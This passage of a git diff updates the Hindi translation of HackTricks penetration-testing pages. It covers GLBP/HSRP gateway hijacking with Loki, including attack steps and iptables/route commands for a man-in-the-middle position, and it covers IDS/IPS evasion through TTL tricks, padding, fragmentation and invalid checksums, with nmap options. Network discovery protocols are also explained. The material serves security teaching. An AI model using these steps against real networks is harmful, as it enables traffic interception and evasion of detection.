ऑफलाइन माना जाता है। हालांकि, ये टाइमर निर्धारित नहीं हैं और संशोधित किए जा सकते हैं। +सिस्को का निर्माण, GLBP, TCP/IP स्टैक पर काम करता है, संचार के लिए UDP का उपयोग करता है पोर्ट 3222 पर। GLBP समूह में राउटर "हैलो" पैकेट्स को 3-सेकंड की अंतराल पर आदान-प्रदान करते हैं। यदि किसी राउटर ने इन पैकेट्स को 10 सेकंड के लिए नहीं भेजा, तो इसे ऑफलाइन माना जाता है। हालांकि, ये टाइमर निर्धारित नहीं हैं और संशोधित किए जा सकते हैं। ### GLBP कार्य और लोड वितरण -GLBP एकल आभासी आईपी के साथ कई आभासी मैक पते का उपयोग करके राउटर्स के बीच लोड वितरण को संभालता है। GLBP समूह में हर राउटर पैकेट फॉरवर्डिंग में शामिल है। HSRP/VRRP की तुलना में, GLBP कई तरीकों के माध्यम से वास्तविक लोड बैलेंसिंग प्रदान करता है: +GLBP एकल आभासी आईपी के साथ कई आभासी मैक पते का उपयोग करके राउटरों के बीच लोड वितरण को संभालता है। GLBP समूह में हर राउटर पैकेट फॉरवर्डिंग में शामिल है। HSRP/VRRP की तुलना में, GLBP कई तरीकों से वास्तविक लोड बैलेंसिंग प्रदान करता है: -- **होस्ट-डिपेंडेंट लोड बैलेंसिंग:** एक होस्ट को स्थिर एवीएफ़ मैक पता का निर्धारण रखता है, जो स्थिर एनएटी कॉन्फ़िगरेशन के लिए आवश्यक है। -- **राउंड-रॉबिन लोड बैलेंसिंग:** डिफ़ॉल्ट दृष्टिकोण, अनुरोध करने वाले होस्टों के बीच एवीएफ़ मैक पता का निर्धारण बारी-बारी से करता है। +- **होस्ट-डिपेंडेंट लोड बैलेंसिंग:** एक होस्ट को स्थिर एवीएफ मैक पता का निर्धारण रखता है, स्थिर एनएटी कॉन्फ़िगरेशन के लिए आवश्यक है। +- **राउंड-रॉबिन लोड बैलेंसिंग:** डिफ़ॉल्ट दृष्टिकोण, अनुरोध करने वाले होस्टों के बीच एवीएफ मैक पता का निर्धारण बदलता है। - **वेटेड राउंड-रॉबिन लोड बैलेंसिंग:** पूर्वनिर्धारित "वेट" मैट्रिक्स के आधार पर लोड वितरण करता है। ### GLBP में मुख्य घटक और शब्दावली -- **AVG (सक्रिय आभासी गेटवे):** मुख्य राउटर, पीयर राउटर्स को मैक पते आवंटित करने के लिए जिम्मेदार। +- **AVG (सक्रिय आभासी गेटवे):** मुख्य राउटर, सहपी राउटरों को मैक पते आवंटित करने के लिए जिम्मेदार। - **AVF (सक्रिय आभासी फ़ोरवर्डर):** नेटवर्क ट्रैफ़िक प्रबंधित करने के लिए निर्धारित एक राउटर। -- **GLBP प्राथमिकता:** AVG को निर्धारित करने वाला मैट्रिक्स, जो डिफ़ॉल्ट रूप से 100 से शुरू होता है और 1 से 255 तक होता है। +- **GLBP प्राथमिकता:** AVG का निर्धारण करने वाला मैट्रिक्स, जो डिफ़ॉल्ट रूप से 100 से शुरू होता है और 1 से 255 के बीच होता है। - **GLBP वेट:** एक राउटर पर वर्तमान लोड को प्रतिबिंबित करता है, जिसे मैन्युअल रूप से या ऑब्जेक्ट ट्रैकिंग के माध्यम से समायोजित किया जा सकता है। - **GLBP आभासी आईपी पता:** सभी कनेक्टेड उपकरणों के लिए नेटवर्क का डिफ़ॉल्ट गेटवे के रूप में काम करता है। -संवाद के लिए, GLBP ने आरक्षित मल्टीकास्ट पता 224.0.0.102 और UDP पोर्ट 3222 का उपयोग किया है। राउटर 3-सेकंड के अंतराल पर "हैलो" पैकेट्स भेजते हैं, और यदि 10-सेकंड की अवधि में कोई पैकेट छूट जाता है, तो वे गैर-परिचालनीय माने जाते हैं। +संवाद के लिए, GLBP आरक्षित मल्टीकास्ट पता 224.0.0.102 और UDP पोर्ट 3222 का उपयोग करता है। राउटर 3-सेकंड की अंतराल पर "हैलो" पैकेट्स भेजते हैं, और यदि 10 सेकंड के अवधि में कोई पैकेट छूट जाता है, तो वे गैर-परिचालनीय माने जाते हैं। ### GLBP हमले की विधि -एक हमलावता GLBP पैकेट भेजकर एक हमलावता राउटर बन सकता है जिसमें सर्वोच्च प्राथमिकता मान (255) होता है। इससे DoS या MITM हमले हो सकते हैं, जिससे ट्रैफ़िक अंतरग्रहण या पुनर्निर्देशन हो सकता है। +एक हमलावर GLBP पैकेट भेजकर सर्वोत्तम प्राथमिक राउटर बन सकता है जिसमें सर्वोच्च प्राथमिकता मान (255) होता है। यह DoS या MITM हमलों का कारण बन सकता है, जिससे ट्रैफिक अंधाधुंध या पुनर्निर्देशित हो सकता है। -### Loki के साथ एक GLBP हमला करना -[Loki](https://github.com/raizo62/loki_on_kali) एक GLBP हमला कर सकता है जिसमें प्राथमिकता और वेट सेट किए गए होते हैं। पूर्व-हमले कदम उपकरणों का उपयोग करके वायरशार्क का उपयोग करके वर्चुअल आईपी पता, प्रमाणीकरण की उपस्थिति, और राउटर प्राथमिकता मूल्यों जैसी जानकारी इकट्ठा करने की आवश्यकता होती है। +### Loki के साथ GLBP हमले का कार्यान्वयन +[Loki](https://github.com/raizo62/loki_on_kali) एक GLBP हमला कर सकता है जिसमें प्राथमिकता और वेट सेट किए गए 255 होते हैं। पूर्व-हमले कदम उपकरणों का उपयोग करके वर्चस्व आईपी पता, प्रमाणीकरण की उपस्थिति, और राउटर प्राथमिकता मूल्यों जैसी जानकारी जुटाने की जरूरत होती है। हमले कदम: 1. प्रोमिस्क्यूअस मोड पर स्विच करें और आईपी फॉरवर्डिंग सक्षम करें। 2. लक्षित राउटर की पहचान करें और उसका आईपी प्राप्त करें। 3. एक ग्रेट्यूटस ARP उत्पन्न करें। 4. AVG का अनुकरण करते हुए एक दुर्भाग्यपूर्ण GLBP पैकेट डालें। -5. हमलावता नेटवर्क इंटरफेस को एक सेकेंडरी आईपी पता सौंपें, GLBP वर्चुअल आईपी का अभिकरण करते हुए। -6. पूर्ण ट्रैफ़िक दृश्यता के लिए एसएनएटी को लागू करें। -7. मूल AVG राउटर के माध्यम से निरंतर इंटरनेट एक्सेस सुनिश्चित करने के लिए रूटिंग समायोजित करें। +5. हमलावर के नेटवर्क इंटरफेस में एक सेकेंडरी आईपी पता निर्धारित करें, GLBP आभासी आईपी का अनुकरण करते हुए। +6. पूर्ण ट्रैफ़िक दृश्यता के लिए एसएनएटी का लागू करें। +7. मूल AVG राउटर के माध्यम से मौजूदा इंटरनेट एक्सेस सुनिश्चित करने के लिए रूटिंग समायोजित करें। -इन कदमों का पालन करके, हमलावता खुद को "मध्य में व्यक्ति" के रूप में स्थापित करता है, जो नेटवर्क ट्रैफ़िक, अक्रिप्ट या संवेदनशील डेटा सहित, को अंतरग्रहण और विश्लेषण करने में सक्षम होता है। +इन कदमों का पालन करके, हमलावर खुद को "मैन इन द मिडिल" के रूप में स्थापित करता है, जो नेटवर्क ट्रैफ़िक, अक्रिप्ट या संवेदनशील डेटा सहित नेटवर्क ट्रैफ़िक को अंतर्दृष्टि और विश्लेषण करने में सक्षम होता है। प्रदर्शन के लिए, यहाँ आवश्यक कमांड स्निपेट्स हैं: ```bash @@ -74,20 +74,20 @@ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE sudo route del default sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100 ``` -### HSRP हाइजैकिंग का पैशिव विवरण कमांड विवरण के साथ +### HSRP हाइजैकिंग का पैसिव विवरण एचएसआरपी के साथ कमांड विवरण -#### HSRP का अवलोकन (हॉट स्टैंडबाई राउटर/पुनरावृत्ति प्रोटोकॉल) -HSRP एक सिस्को प्रोप्राइटरी प्रोटोकॉल है जो नेटवर्क गेटवे पुनरावृत्ति के लिए डिज़ाइन किया गया है। इसकी मदद से कई भौतिक राउटर्स को एक एकल तार्किक इकाई में कॉन्फ़िगर किया जा सकता है जिसमें एक साझा आईपी पता होता है। यह तार्किक इकाई प्रमुख राउटर द्वारा प्रबंधित की जाती है जो ट्रैफ़िक को निर्देशित करने के लिए जिम्मेदार होता है। GLBP की तरह, जो लोड बैलेंसिंग के लिए प्राथमिकता और वज़न जैसी मैट्रिक्स का उपयोग करता है, HSRP ट्रैफ़िक प्रबंधन के लिए एक ही सक्रिय राउटर पर निर्भर है। +#### HSRP का अवलोकन (हॉट स्टैंडबाय राउटर/पुनरावर्तन प्रोटोकॉल) +HSRP एक सिस्को प्रोप्राइटरी प्रोटोकॉल है जो नेटवर्क गेटवे पुनरावर्तन के लिए डिज़ाइन किया गया है। इसकी मदद से कई भौतिक राउटर्स को एक एकल तार्किक इकाई में कॉन्फ़िगर किया जा सकता है जिसमें एक साझा आईपी पता होता है। यह तार्किक इकाई प्रधान राउटर द्वारा प्रबंधित की जाती है जो ट्रैफ़िक को निर्देशित करने के लिए जिम्मेदार होता है। GLBP की तरह, जो लोड बैलेंसिंग के लिए प्राथमिकता और वज़न जैसी मैट्रिक्स का उपयोग करता है, HSRP ट्रैफ़िक प्रबंधन के लिए एक ही सक्रिय राउटर पर निर्भर है। #### HSRP में भूमिकाएँ और शब्दावली - **HSRP सक्रिय राउटर**: गेटवे के रूप में कार्य करने वाली डिवाइस, ट्रैफ़िक फ्लो का प्रबंधन करना। -- **HSRP स्टैंडबाई राउटर**: एक बैकअप राउटर, जो सक्रिय राउटर की विफलता के मामले में कार्रवाई करने के लिए तैयार है। -- **HSRP समूह**: एक एकल सहायक वर्चुअल राउटर बनाने के लिए सहयोग करने वाले राउटरों का एक सेट। -- **HSRP MAC पता**: HSRP सेटअप में तार्किक राउटर को निर्धारित किया गया वर्चुअल MAC पता। +- **HSRP स्टैंडबाय राउटर**: एक बैकअप राउटर, जो सक्रिय राउटर की विफलता के मामले में कार्रवाई करने के लिए तैयार है। +- **HSRP समूह**: एक एकल प्रतिरोधी वर्चुअल राउटर बनाने के लिए सहयोग करने वाले राउटर्स का सेट। +- **HSRP MAC पता**: एचएसआरपी सेटअप में तार्किक राउटर को निर्धारित किया गया वर्चुअल MAC पता। - **HSRP वर्चुअल आईपी पता**: HSRP समूह का वर्चुअल आईपी पता, जो कनेक्टेड डिवाइस के लिए डिफ़ॉल्ट गेटवे के रूप में कार्य करता है। #### HSRP संस्करण HSRP दो संस्करणों में आता है, HSRPv1 और HSRPv2, जिनमें समूह क्षमता, मल्टीकास्ट आईपी उपयोग, और वर्चुअल MAC पता संरचना में मुख्य रूप से अंतर है। प्रोटोकॉल विशेष मल्टीकास्ट आईपी पते का उपयोग सेवा सूचना विनिमय के लिए करता है, हैलो पैकेट्स हर 3 सेकंड में भेजे जाते हैं। एक राउटर को अव्याक्त माना जाता है अगर 10 सेकंड के अंतराल में कोई पैकेट प्राप्त नहीं होता है। -#### HSRP हमले की तंत्रिका -HSRP हमले में सक्रिय राउटर की भूमिका को ज़बरदस्ती से अधिक प्राथमिकता मान कर लेना शामिल है। यह एक मैन-इन-द-मिडिल (MITM) हमले की ओर ले जा सकता है। महत्वपूर्ण पूर्व-हमले कदमों में HSRP सेटअप के बारे में डेटा जुटाना शामिल है, जो ट्रैफ़िक विश्लेषण के लिए वायरशार्क का उपयोग करके किया जा सकता है। +#### HSRP हमले की विधि +HSRP हमले में सक्रिय राउटर की भूमिका को ज़बरदस्ती अधिकतम प्राथमिकता मान कर लेना शामिल है। यह एक मैन-इन-द-मिडिल (MITM) हमले की ओर ले जा सकता है। महत्वपूर्ण पूर्व-हमले कदम एचएसआरपी सेटअप के बारे में डेटा जुटाना है, जो ट्रैफ़िक विश्लेषण के लिए वायरशार्क का उपयोग करके किया जा सकता है। diff --git a/generic-methodologies-and-resources/pentesting-network/ids-evasion.md b/generic-methodologies-and-resources/pentesting-network/ids-evasion.md index e7d52067e..f8af2bffa 100644 --- a/generic-methodologies-and-resources/pentesting-network/ids-evasion.md +++ b/generic-methodologies-and-resources/pentesting-network/ids-evasion.md @@ -1,71 +1,73 @@ +{% hint style="success" %} +सीखें और प्रैक्टिस AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें। -* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** को फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} # **TTL मैनिपुलेशन** -कुछ पैकेट भेजें जिनका TTL IDS/IPS तक पहुंचने के लिए पर्याप्त हो, लेकिन अंतिम सिस्टम तक पहुंचने के लिए पर्याप्त न हो। और फिर, उन्हीं सीक्वेंस के साथ एक और पैकेट भेजें ताकि IPS/IDS सोचेगा कि वे दोहराव हैं और उन्हें जांचेगा नहीं, लेकिन वास्तव में वे दुरुपयोगी सामग्री ले जा रहे हैं। +कुछ पैकेट भेजें जिनका TTL IDS/IPS तक पहुंचने के लिए पर्याप्त हो, लेकिन अंतिम सिस्टम तक पहुंचने के लिए पर्याप्त न हो। और फिर, उन्हें दूसरे पैकेट भेजें जिनकी सीक्वेंस उन अन्य पैकेटों के समान हो ताकि IPS/IDS यह सोचें कि वे दोहराव हैं और उन्हें जांचेंगे नहीं, लेकिन वास्तव में वे दुष्ट सामग्री ले जा रहे हैं। **Nmap विकल्प:** `--ttlvalue <मान>` # हस्ताक्षरों से बचें -पैकेट में कचरा डेटा जोड़ें ताकि IPS/IDS हस्ताक्षर को टाल दें। +पैकेट में कचरा डेटा जोड़ें ताकि IPS/IDS हस्ताक्षर को टाल सकें। **Nmap विकल्प:** `--data-length 25` # **विभाजित पैकेट्स** -पैकेट को विभाजित करें और भेजें। यदि IDS/IPS को उन्हें पुनर्गठित करने की क्षमता नहीं है, तो वे अंतिम होस्ट तक पहुंचेंगे। +पैकेट को विभाजित करें और उन्हें भेजें। यदि IDS/IPS को उन्हें पुनर्गठित करने की क्षमता नहीं है, तो वे अंतिम होस्ट तक पहुंचेंगे। **Nmap विकल्प:** `-f` # **अमान्य** _**चेकसम**_ -सेंसर आम तौर पर प्रदर्शन कारणों के लिए चेकसम की गणना नहीं करते। इसलिए एक हमलावर एक पैकेट भेज सकता है जो **सेंसर द्वारा व्याख्या किया जाएगा लेकिन अंतिम होस्ट द्वारा अस्वीकृत किया जाएगा।** उदाहरण: +सेंसर्स सामर्थ्य कारणों के लिए चेकसम की गणना नहीं करते हैं। इसलिए एक हमलावर एक पैकेट भेज सकता है जो सेंसर द्वारा व्याख्या किया जाएगा लेकिन अंतिम होस्ट द्वारा अस्वीकृत किया जाएगा। उदाहरण: -एक पैकेट भेजें जिसमें RST फ्लैग और एक अमान्य चेकसम हो, ताकि फिर, IPS/IDS यह सोच सकता है कि यह पैकेट कनेक्शन बंद करने जा रहा है, लेकिन अंतिम होस्ट चेकसम अमान्य होने के कारण पैकेट को खारिज कर देगा। +एक पैकेट भेजें जिसमें RST फ्लैग और एक अमान्य चेकसम हो, तो फिर, IPS/IDS यह सोच सकते हैं कि यह पैकेट कनेक्शन बंद करने जा रहा है, लेकिन अंतिम होस्ट चेकसम अमान्य होने के कारण पैकेट को खारिज कर देगा। -# **असामान्य IP और TCP विकल्प** +# **असामान्य आईपी और TCP विकल्प** -एक सेंसर संभावित है कि IP और TCP हेडर्स के भीतर निर्दिष्ट ध्वज और विकल्पों वाले पैकेट्स को नजरअंदाज करेगा, जबकि गंतव्य होस्ट पैकेट को प्राप्त करने पर स्वीकार करेगा। +एक सेंसर ऐसे आईपी और TCP हेडर्स के भीतर निर्धारित ध्वज और विकल्पों वाले पैकेट्स को नजरअंदाज कर सकता है, जबकि गंतव्य होस्ट पैकेट को प्राप्त करने पर स्वीकार करता है। # **ओवरलैपिंग** -संभावना है कि जब आप एक पैकेट को विभाजित करते हैं, पैकेटों के बीच किसी प्रकार का ओवरलैपिंग हो (शायद पैकेट 2 के पहले 8 बाइट पैकेट 1 के आखिरी 8 बाइट के साथ ओवरलैप होता है, और पैकेट 2 के आखिरी 8 बाइट पैकेट 3 के पहले 8 बाइट के साथ ओवरलैप होता है)। फिर, यदि IDS/IPS उन्हें एक अलग तरीके से पुनर्गठित करता है जैसा कि अंतिम होस्ट, तो एक भिन्न पैकेट का व्याख्यान होगा।\ -या शायद, 2 पैकेट्स जिनका समान ऑफसेट है आते हैं और होस्ट को यह निर्णय लेना होता है कि वह किसे लेता है। +संभावना है कि जब आप एक पैकेट को विभाजित करते हैं, पैकेटों के बीच कुछ प्रकार का ओवरलैपिंग हो (शायद पैकेट 2 के पहले 8 बाइट पैकेट 1 के आखिरी 8 बाइट के साथ ओवरलैप होता है, और पैकेट 2 के आखिरी 8 बाइट पैकेट 3 के पहले 8 बाइट के साथ ओवरलैप होता है)। फिर, यदि IDS/IPS उन्हें अलग-अलग तरीके से पुनर्गठित करता है, तो एक भिन्न पैकेट व्याख्या किया जाएगा।\ +या शायद, 2 पैकेट्स एक ही ऑफसेट के साथ आते हैं और होस्ट को यह निर्णय लेना होता है कि वह किसे लेता है। -* **BSD**: यह पैकेट्स के लिए छोटे _ऑफसेट_ वाले पैकेट्स की प्राथमिकता रखता है। समान ऑफसेट वाले पैकेट्स के लिए, यह पहला चुनेगा। -* **Linux**: BSD की तरह, लेकिन यह अंतिम पैकेट को अधिक पसंद करता है जिसका समान ऑफसेट है। -* **पहला** (Windows): जो मान आता है, वह मान रहा है। -* **अंतिम** (सिस्को): जो मान आता है, वह मान रहा है। +* **बीएसडी**: यह पैकेट्स के छोटे _ऑफसेट_ वाले पैकेट्स की प्राथमिकता रखता है। एक ही ऑफसेट वाले पैकेट्स के लिए, यह पहला चुनेगा। +* **लिनक्स**: बीएसडी की तरह, लेकिन यह अंतिम पैकेट को अधिक पसंद करता है जिसमें एक ही ऑफसेट है। +* **पहला** (विंडोज): जो मान पहला आता है, वह मान बना रहता है। +* **अंतिम** (सिस्को): जो मान अंतिम आता है, वह मान बना रहता है। # उपकरण * [https://github.com/vecna/sniffjoke](https://github.com/vecna/sniffjoke) +{% hint style="success" %} +सीखें और प्रैक्टिस AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें। -* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** को फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} diff --git a/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md b/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md index cb75551d0..f83439b94 100644 --- a/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md +++ b/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md @@ -1,55 +1,57 @@ +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* अगर आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** को पीआर जमा करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** को** **फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
+{% endhint %} -## Multicast DNS (mDNS) +## मल्टीकास्ट DNS (mDNS) -**mDNS** प्रोटोकॉल एक विशेषित नाम सर्वर के बिना छोटे, स्थानीय नेटवर्क में IP पता सुलझाने के लिए डिज़ाइन किया गया है। यह सबनेट के भीतर एक क्वेरी को मल्टीकास्ट करके संचालित होता है, जिससे निर्दिष्ट नाम वाले होस्ट को अपना IP पता देने के लिए प्रोत्साहित किया जाता है। इस सूचना के साथ सभी उपकरण स्वयं अपने mDNS कैश को अपडेट कर सकते हैं। +**mDNS** प्रोटोकॉल एक डेडिकेटेड नेम सर्वर के बिना छोटे, स्थानीय नेटवर्क में आईपी पता सुलझाने के लिए डिज़ाइन किया गया है। यह सबनेट के भीतर एक क्वेरी को मल्टीकास्ट करके ऑपरेट करता है, जिससे निर्दिष्ट नाम वाले होस्ट से उसका आईपी पता प्रतिसाद देने के लिए प्रोत्साहित किया जाता है। इस जानकारी के साथ सबनेट में सभी उपकरण फिर अपने mDNS कैश को अपडेट कर सकते हैं। महत्वपूर्ण बिंदुओं को ध्यान में रखें: -- **डोमेन नाम त्यागना**: एक होस्ट अपना डोमेन नाम जारी कर सकता है जब वह जीरो की TTL के साथ एक पैकेट भेजता है। -- **उपयोग प्रतिबंध**: mDNS सामान्यत: केवल **.local** समाप्त होने वाले नामों को सुलझाता है। इस डोमेन में गैर-mDNS होस्ट्स के साथ संघर्ष के लिए नेटवर्क कॉन्फ़िगरेशन समायोजन की आवश्यकता होती है। +- **डोमेन नाम त्यागना**: एक होस्ट अपना डोमेन नाम जारी कर सकता है जब वह एक जीरो के TTL के साथ एक पैकेट भेजता है। +- **उपयोग प्रतिबंध**: mDNS आम तौर पर केवल **.local** समाप्त होने वाले नामों को सुलझाता है। इस डोमेन में गैर-mDNS होस्ट्स के साथ संघर्ष के लिए नेटवर्क कॉन्फ़िगरेशन समायोजन की आवश्यकता होती है। - **नेटवर्किंग विवरण**: - ईथरनेट मल्टीकास्ट MAC पते: IPv4 - `01:00:5E:00:00:FB`, IPv6 - `33:33:00:00:00:FB`। -- IP पते: IPv4 - `224.0.0.251`, IPv6 - `ff02::fb`। -- UDP पोर्ट 5353 पर संचालित होता है। -- mDNS क्वेरी स्थानीय नेटवर्क में सीमित होती है और राउटर्स को पार नहीं करती। +- आईपी पते: IPv4 - `224.0.0.251`, IPv6 - `ff02::fb`। +- UDP पोर्ट 5353 पर ऑपरेट करता है। +- mDNS क्वेरी स्थानीय नेटवर्क में सीमित होती है और राउटर्स को पार नहीं करती है। ## DNS-SD (सेवा खोज) -DNS-SD एक प्रोटोकॉल है जो नेटवर्क पर सेवाओं को खोजने के लिए विशिष्ट डोमेन नामों (जैसे, `_printers._tcp.local`) का क्वेरी करके काम करता है। एक प्रतिक्रिया में सभी संबंधित डोमेन शामिल होते हैं, जैसे इस मामले में उपलब्ध प्रिंटर। एक समग्र सेवा प्रकारों की सूची [यहाँ](http://www.dns-sd.org/ServiceTypes.html) मिल सकती है। +DNS-SD एक प्रोटोकॉल है जो नेटवर्क पर सेवाओं को खोजने के लिए विशिष्ट डोमेन नामों (जैसे, `_printers._tcp.local`) क्वेरी करके डिस्कवरी करता है। एक प्रतिक्रिया में सभी संबंधित डोमेन शामिल होते हैं, जैसे इस मामले में उपलब्ध प्रिंटर। एक समग्र सेवा प्रकारों की सूची [यहाँ](http://www.dns-sd.org/ServiceTypes.html) मिल सकती है। -## SSDP (सिम्पल सेवा खोज प्रोटोकॉल) +## SSDP (सिम्पल सेवा डिस्कवरी प्रोटोकॉल) -SSDP नेटवर्क सेवाओं की खोज को सुविधाजनक बनाता है और मुख्य रूप से UPnP द्वारा उपयोग किया जाता है। यह एक पाठ-आधारित प्रोटोकॉल है जो UDP का उपयोग करता है (पोर्ट 1900 पर), मल्टीकास्ट पतों के साथ। IPv4 के लिए, निर्धारित मल्टीकास्ट पता है `239.255.255.250`। SSDP की आधारभूतता [HTTPU](https://en.wikipedia.org/wiki/HTTPU) है, जो UDP के लिए HTTP का एक विस्तार है। +SSDP नेटवर्क सेवाओं की खोज को सुविधाजनक बनाता है और मुख्य रूप से UPnP द्वारा उपयोग किया जाता है। यह मल्टीकास्ट पतों का उपयोग करता है, जो UDP पर पोर्ट 1900 के माध्यम से होता है। IPv4 के लिए, निर्धारित मल्टीकास्ट पता `239.255.255.250` है। SSDP की आधारभूत बुनियाद [HTTPU](https://en.wikipedia.org/wiki/HTTPU) है, जो UDP के लिए HTTP का एक विस्तार है। -## उपकरणों के लिए वेब सेवा (WSD) -नेटवर्क से जुड़े उपकरण वेब सेवा के माध्यम से उपलब्ध सेवाओं की पहचान कर सकते हैं, जैसे प्रिंटर। इसमें UDP पैकेटों को ब्रॉडकास्ट करना शामिल है। सेवाएं चाहने वाले उपकरण अनुरोध भेजते हैं, जबकि सेवा प्रदाताएं अपने प्रस्तावों की घोषणा करती हैं। + +## डिवाइस के लिए वेब सेवा (WSD) +नेटवर्क से जुड़े डिवाइस वेब सेवा के माध्यम से उपलब्ध सेवाओं की पहचान कर सकते हैं, जैसे प्रिंटर, इसमें UDP पैकेट्स को ब्रॉडकास्ट करना शामिल है। सेवाएं चाहने वाले डिवाइस अनुरोध भेजते हैं, जबकि सेवा प्रदाताएं अपने प्रस्तावों की घोषणा करते हैं। ## OAuth 2.0 -OAuth 2.0 एक प्रोटोकॉल है जो सुरक्षित, विवेकपूर्ण रूप से उपयोगकर्ता जानकारी का साझा करना सुनिश्चित करने में सहायक है। उदाहरण के लिए, यह सेवाओं को बिना कई लॉगिन किए गूगल से उपयोगकर्ता डेटा तक पहुंचने की सुविधा प्रदान करता है। इस 